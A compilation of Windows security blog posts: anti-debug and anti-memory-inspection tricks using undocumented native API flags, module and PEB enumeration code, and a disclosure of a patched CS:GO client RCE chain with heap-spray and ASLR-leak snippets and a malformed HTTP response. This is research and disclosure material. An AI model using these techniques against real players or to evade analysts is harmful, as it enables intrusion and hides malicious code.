for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Enumerating process modules

On my quest of writing a library to wrap common winapi functionality using native apis I came across the need to enumerate process modules. One may think that there is a simple undocumented function to achieve such functionality, however that is not the case.

Existing options

First of all lets see what are the existing APIs that are provided by microsoft because surely they’d know their own code and the operating systems limitations best.

  • Process Status API has a rather understandable and simple interface to get an array of module handles and then acquire the information of module using other functions. If you have written windows specific code before you might feel rather comfortable but for a new developer dealing with extensive error handling due to the fact that you may need to reallocate memory might not be very fun.

    Structures and usage.

1
2
3
BOOL  EnumProcessModules(HANDLE process, HMODULE* modules, DWORD byteSize, DWORD* reqByteSize);
BOOL  GetModuleInformation(HANDLE process, HMODULE module, MODULEINFO* info, DWORD infoSize);
DWORD GetModuleFileNameEx(HANDLE process, HMODULE module, TCHAR* filename, DWORD filenameMaxSize);
  • Next up Tool Help is at the same time simpler and more complex than PSAPI. It does not require the user to allocate memory by himself and returns fully processed structures but requires quite a few extra steps. Toolhelp also leaves some opportunities for the user to shoot himself in the foot such as returning INVALID_HANDLE_VALUE instead of nullptr on failure and requires to clean up the resources by closing the handle.

    Structures and usage.

1
2
3
HANDLE CreateToolhelp32Snapshot(DWORD flags, DWORD processId);
BOOL   Module32First(HANDLE snapshot, MODULEENTRY32* entry);
BOOL   Module32Next(HANDLE snapshot, MODULEENTRY32* entry);

Performance

An important aspect of these functions is how fast they are. Below are some rough benchmarks of these apis to get full module information including its full path on a machine running Windows 10 with an i7-8550u processor compared to implementation written by ourselves.

TLHELP PSAPI native
220ms 2200 ms 50ms

Turns out that while EnumProcessModules is really fast by itself it only saves the dll base address instead of something like LDR_DATA_TABLE_ENTRY address where all of the information is saved. Due to this every single time you want to for example get the module name it repeats all the work iterating modules list once again.

The implementation

So what exactly do we need to do to get the modules of another process?

In essence the answer is rather simple:

  • Get its Process Environment Block (PEB) address.
  • Walk the LDR table whose address we acquired from PEB.

The first problem is that a process may have 2 PEBs - one 32bit and one 64bit. The most intuitive behaviour would be to get the modules of the same architecture as the target process. However NtQueryInformationProcess with the ProcessBasicInformation flag gives us access only to the PEB of the same architecture as ours. This problem was solved in the previous post so it will not be discussed further again.

The next problem is that PEB is not the only thing that depends on architecture. All structures and functions we plan to use will also need to be apropriatelly selected. To overcome this hurdle we will create 2 structures containing the correct functions and the type to use for representing pointers. We want to use different memory reading functions because if we are a 32 bit process NtReadVirtualMemory will also expect a 32 bit address which might not be sufficient when the target process is 64bit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
template<class TargetPointer>
struct native_subsystem {
  using target_pointer = TargetPointer;

  template<class T>
  NTSTATUS static read(void* handle, uintptr_t address,
                       T&    buffer, size_t    size = sizeof(T)) noexcept
  {
    return NtReadVirtualMemory(
      handle, reinterpret_cast<void*>(address), &buffer, size, nullptr);
  }
};

struct wow64_subsystem {
  using target_pointer = uint64_t;

  template<class T>
  NTSTATUS static read(void* handle, uint64_t address,
                       T&    buffer, uint64_t size = sizeof(T)) noexcept
  {
    return NtWow64ReadVirtualMemory64(handle, address, &buffer, size, nullptr);
  }
};

For convenience sake and to keep our code DRY we will also need to write some sort of helper function which picks one of the aforementioned structures to use. For that we will use some templates. If this doesn’t fit you, macros or just functions pointers are an option, both of which have a set of their own pros and cons.

1
2
3
4
5
6
7
8
9
10
11
template<class Fn, class... As>
NTSTATUS subsystem_call(bool same_arch, Fn fn, As&&... args)
{
  if(same_arch)
    return fn.template operator()<native_subsystem<uintptr_t>>(forward<As>(args)...);
#ifdef _WIN64
  return fn.template operator()<native_subsystem<uint32_t>>(forward<As>(args)...);
#else
  return fn.template operator()<wow64_subsystem>(forward<As>(args)...);
#endif
}

While I agree this function looks rather ugly, operator() is really the most sane option because you don’t have to worry about naming things. Its usage is rather simple too. All you have to do is pass it whether the architecture is the same and a structure whose operator() is overloaded and accepts the subsystem type. We can take a look at exactly how the usage looks like by finally taking use of the functions we wrote earlier and completing the first step of getting the correct PEB pointer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
template<class Callback>
NTSTATUS enum_modules(void* handle, Callback cb) noexcept
{
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  ret_on_err(NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr));

  const bool same_arch = is_process_same_arch(info);

  std::uint64_t peb_address;
  if(same_arch)
    peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
  else
    ret_on_err(remote_peb_address(handle, false, peb_address)));

  return subsystem_call(same_arch, enum_modules_t{}, handle, std::move(cb), peb_address);
}

Now all that is left is to implement the actual modules enumeration about which I won’t be talking as much because it is rather straightforward and information about it is easily found on the internet. For it to work you’ll also need architecture agnostic versions of windows structures that you can be easily made by templating their member types and some find+replace.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
struct enum_modules_t {
  template<class Subsystem, class Callback>
  NTSTATUS operator()(void* handle, Callback cb, std::uint64_t peb_address) const
  {
    using ptr_t = typename Subsystem::target_pointer;

    // we read the Ldr member of peb
    ptr_t Ldr;
    ret_on_err(Subsystem::read(handle,
                               static_cast<ptr_t>(peb_address) +
                                offsetof(peb_t<ptr_t>, Ldr),
                               Ldr));

    const auto list_head =
      Ldr + offsetof(peb_ldr_data_t<ptr_t>, InLoadOrderModuleList);

    // read InLoadOrderModulesList.Flink
    ptr_t load_order_modules_list_flink;
    ret_on_err(Subsystem::read(handle, list_head, load_order_modules_list_flink));

    ldr_data_table_entry_t<ptr_t> entry;

    // iterate over the modules list
    for(auto list_curr = load_order_modules_list_flink; list_curr != list_head;) {
      // read the entry
      ret_on_err(Subsystem::read(handle, list_curr, entry));

      // update the pointer to entry
      list_curr = entry.InLoadOrderLinks.Flink;

      // call the callback with the info.
      // to get the path we would need another read.
      cb(info);
  }

    return STATUS_SUCCESS;
  }
};

Acquiring process environment block (PEB)

While attempting to enumerate modules of a remote process I came across the need to acquire the process environment block or PEB in short. While it may seem quite simple - that is a single native API call and you are done the problem is that there actually are 2 evironment blocks.

The problem at hand

As it turns out, the most documented method NtQueryInformationProcess(ProcessBasicInformation) can only acquire the address of PEB whose architecture is same as of your own process. As you can guess if the architectures do not match, the address you get is quite useless when trying to enumerate loaded modules. To solve the problem one has to use a bunch of different combinations of flags and APIs to get the correct structure.

Implementation

To cut the chase here is a table of exactly what needs to be used to correctly acquire the PEB according to architecture of your own and target process.

Target Local Function
same same NtQueryInformationProcess(ProcessBasicInformation)
32 bit 64 bit NtQueryInformationProcess(ProcessWow64Information)
64 bit 32 bit NtWow64QueryInformationProcess64(ProcessBasicInformation)

First step is to figure out whether our process is of the same architecture. Coincidentally that can be done by reusing the return value of same native API that actually returns the address of PEB.

1
2
3
4
5
6
7
8
9
10
11
// acquire the PROCESS_EXTENDED_BASIC_INFORMATION of target process
PROCESS_EXTENDED_BASIC_INFORMATION info;
info.Size = sizeof(info);
NtQueryInformationProcess(
  handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

// function to check whether the arch is the same
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

And in the case where the architecture doesn’t match we can then choose to use one of the other two aforementioned APIs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
NTSTATUS remote_peb_diff_arch(void* handle, uint64_t& peb_addr) noexcept
{
#ifdef _WIN64 // we are x64 and target is x32
  return NtQueryInformationProcess(
    handle, ProcessWow64Information, &peb_addr, sizeof(peb_addr), nullptr);
#else // we are x32 and the target is x64
  PROCESS_BASIC_INFORMATION64 pbi;
  const auto status = NtWow64QueryInformationProcess64(
    handle, ProcessBasicInformation, &pbi, sizeof(pbi), nullptr);

  if(NT_SUCCESS(status))
    peb_addr = pbi.PebBaseAddress;
  return status;
#endif
}

Lastly here is the full, finished code listing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

NTSTATUS peb_address(void* handle, std::uint64_t& address) noexcept
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  auto status = NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

  if(NT_SUCCESS(status)){
    if(is_process_same_arch(info))
      peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
    else
      status = remote_peb_address(handle, false, peb_address));
  }

  return status;
}

The next article will explain how to enumerate the loaded modules list.

Preventing memory inspection on Windows

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

